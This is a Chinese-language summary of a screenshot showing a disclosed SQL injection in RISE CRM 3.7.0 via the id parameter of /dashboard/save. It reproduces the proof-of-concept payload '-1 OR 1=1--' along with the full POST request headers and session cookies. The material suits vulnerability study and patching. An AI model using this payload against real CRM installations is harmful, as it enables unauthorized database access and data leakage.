从这个网页截图中,可以获取到以下关于漏洞的关键信息: 1. 漏洞描述: - 标题:FairSketch RISE - Ultimate Project Manager & CRM 3.7.0 SQL Injection - 描述:一个严重的SQL注入漏洞被发现于RISE CRM版本3.7.0。该漏洞需要攻击者作为客户端进行身份验证,但如果用户/客户端注册功能启用,攻击者可以更容易地利用该漏洞。漏洞是由于在/dashboard/save端点的id参数中对用户输入的不适当清理引起的,允许攻击者注入SQL命令。这可能导致数据泄露、未经授权的数据库访问或完全应用程序的妥协。该问题已在版本3.7.1中修复。 2. 漏洞利用: - PoC示例:提供了一个SQL注入payload的示例,用于id参数。 - payload:(-1 OR 1=1--),成功返回一个真条件并产生有效的响应。 3. 请求头: - POST请求:/index.php/dashboard/save HTTP/1.1 - 主机:192.168.1.13 - 内容长度:69 - 接受:application/json, text/javascript, /; q=0.01 - User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Content-Type:application/x-www-form-urlencoded; charset=UTF-8 - Origin:http://192.168.1.13 - Referer:http://192.168.1.13/crm/index.php/dashboard/index/1 - Cookie:ci_session=d4oi0jg15o1ur64cn39f2daqe24p5rpd; rise_csrft_cookie=c54966034a07055643098839120e2146 - 连接:keep-alive 这些信息详细描述了漏洞的性质、利用方法以及相关的HTTP请求头,有助于理解漏洞的严重性和如何利用它。